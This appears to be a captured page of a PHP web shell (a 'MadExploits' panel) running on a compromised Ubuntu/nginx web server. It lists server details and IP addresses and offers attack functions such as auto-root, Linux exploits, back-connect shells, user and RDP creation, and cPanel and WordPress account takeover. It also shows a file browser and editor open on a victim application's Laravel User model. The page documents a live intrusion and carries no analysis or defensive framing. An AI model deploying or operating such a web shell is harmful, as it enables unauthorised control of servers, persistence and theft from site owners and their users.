Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-auth /
app /
Modules /
User /
Entities /
[ HOME SHELL ]
Name
Size
Permission
Action
.gitkeep
0
B
-rw-rw-r--
User.php
2.17
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : User.php
<?php namespace App\Modules\User\Entities; use Illuminate\Auth\Authenticatable; use Illuminate\Contracts\Auth\Access\Authorizable as AuthorizableContract; use Illuminate\Contracts\Auth\Authenticatable as AuthenticatableContract; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; use Laravel\Lumen\Auth\Authorizable; use Yojana\Traits\CommonTrait; use Illuminate\Notifications\Notifiable; use App\Modules\Account\Entities\Account; use App\Modules\Account\Entities\AccountUser; use Laravel\Passport\HasApiTokens; use App\OauthAccessToken; /** * App\Models\Auth\User\User * * @property int $id * @property string $phone * @property string $email * @property string|null $password * @property string $is_active * @property \Illuminate\Support\Carbon|null $created_at * @property \Illuminate\Support\Carbon|null $updated_at * @method static Builder|User withTrashed() * @method static Builder|User withoutTrashed() * @mixin \Eloquent */ class User extends Model implements AuthenticatableContract, AuthorizableContract { use Authenticatable,HasApiTokens, Authorizable, HasFactory, CommonTrait,Notifiable; /** * The attributes that are mass assignable. * * @var array */ protected $fillable = [ 'uuid', 'email', 'phone', 'password', 'is_active' ]; /** * The attributes that should be hidden for arrays. * * @var array */ protected $hidden = [ 'password', 'remember_token', ]; protected $appends = ['account_ids']; public function accounts() { return $this->belongsToMany(Account::class); } public function getAccountIdsAttribute() { return $this->accounts()->pluck('accounts.id'); } public function getAccountIdAttribute() { return $this->accounts()->pluck('accounts.id')[0]; } public function AauthAcessToken() { return $this->hasMany(OauthAccessToken::class); } public function account_user() { return $this->hasOne(AccountUser::class, 'user_id', 'id'); } public function findForPassport($identifier) { return $this->orWhere('email', $identifier)->first(); } }
Close